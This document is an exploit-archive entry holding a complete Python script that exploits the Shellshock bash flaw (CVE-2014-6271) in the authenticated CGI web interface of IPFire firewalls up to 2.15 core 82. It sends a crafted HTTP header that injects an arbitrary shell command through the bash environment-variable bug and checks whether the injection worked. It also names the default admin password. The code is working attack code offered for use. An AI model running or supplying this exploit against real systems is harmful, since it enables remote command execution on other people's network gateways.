IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection



Platform:

CGI

Date:

2014-10-01


#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
#       It can be maintained via a web interface.
#       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
#       IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
#
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
#                (CVE-2014-6271)
#
# Suggestion:
#
# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
#
#
# http connection
import urllib2
# Basic Auth management Base64
import base64
# Args management
import optparse
# Error management
import sys

banner = """
       ___ _______ _______ __                _______       __
      |   |   _   |   _   |__.----.-----.   |   _   .-----|__|
      |.  |.  1   |.  1___|  |   _|  -__|   |.  1___|  _  |  |
      |.  |.  ____|.  __) |__|__| |_____|   |.  |___|___  |__|
      |:  |:  |   |:  |                     |:  1   |_____|
      |::.|::.|   |::.|                     |::.. . |
      `---`---'   `---'                     `-------'
   _______ __          __ __ _______ __               __
  |   _   |  |--.-----|  |  |   _   |  |--.-----.----|  |--.
  |   1___|     |  -__|  |  |   1___|     |  _  |  __|    <
  |____   |__|__|_____|__|__|____   |__|__|_____|____|__|__|
  |:  1   |                 |:  1   |
  |::.. . |                 |::.. . |
  `-------'                 `-------'

                                IPFire <= 2.15 c0re 82 Authenticated
                                Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n

                          Written by:

                        Claudio Viviani

                     http://www.homelab.it

                        info@homelab.it
                    homelabit@protonmail.ch

               https://www.facebook.com/homelabit
                  https://twitter.com/homelabit
               https://plus.google.com/+HomelabIt1/
     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] IPFire Basic Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
                headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
                response = urllib2.Request(url, None, headers)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                if "ipfire" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    if 'H0m3l4b1t' in  content:
                        print '[!] Command "'+cmd+'": INJECTED!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                     print '[X] No IPFire page found'
            except urllib2.HTTPError, e:
                if e.code == 401:
                   print '[X] Wrong username or password'
                else:
                   print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-u', '--user', action="store",
                  help="Insert username",
                  )
commandList.add_option('-p', '--pwd', action="store",
                  help="Insert password",
                  )
options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd

connectionScan(url,user,pwd,cmd)